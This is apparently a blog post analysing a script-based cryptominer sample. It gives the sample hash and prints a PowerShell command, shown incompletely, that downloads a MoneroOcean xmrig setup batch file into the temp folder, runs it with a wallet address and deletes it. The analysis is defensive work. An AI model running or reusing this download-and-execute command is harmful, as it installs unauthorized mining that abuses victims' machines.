Analysis CryptoMiner Sample ( Script Based )

In this article we will start analyzing a PowerShell script that downloads and runs another batch script to perform crypto mining. Crypto mining is conducted using specialized computer hardware to solve complex mathematical puzzles, validating and recording transactions on a blockchain.

Sample SHA-256 : d27411cd11d31d025ccc9fac9d49aa5a91aa934e9964a54340e25fbff886ed9b

Malicious Code ( First Stage ) :

powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat';

$tempfile); &

$tempfile 85qqTVL8RQGJSvZMfenDwqBUyVrsaNpVWUMxnXKzbcwAM; Remove-Item -Force $tempfile"

Malicious Code Analysis ( First Stage ) :

1- Malware Developer declared a variable to download an content from internet then drop into %TEMP% folder .

Code (1) : powershell -Command "$wc = New-Object System.Net.WebClient;

2- Downloading Process : $wc.DownloadFile('https[://]raw[.]githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat'.

Batch Script SRC :

Reverse The Malware

Analysis CryptoMiner Sample ( Script Based )

Comments

Post a Comment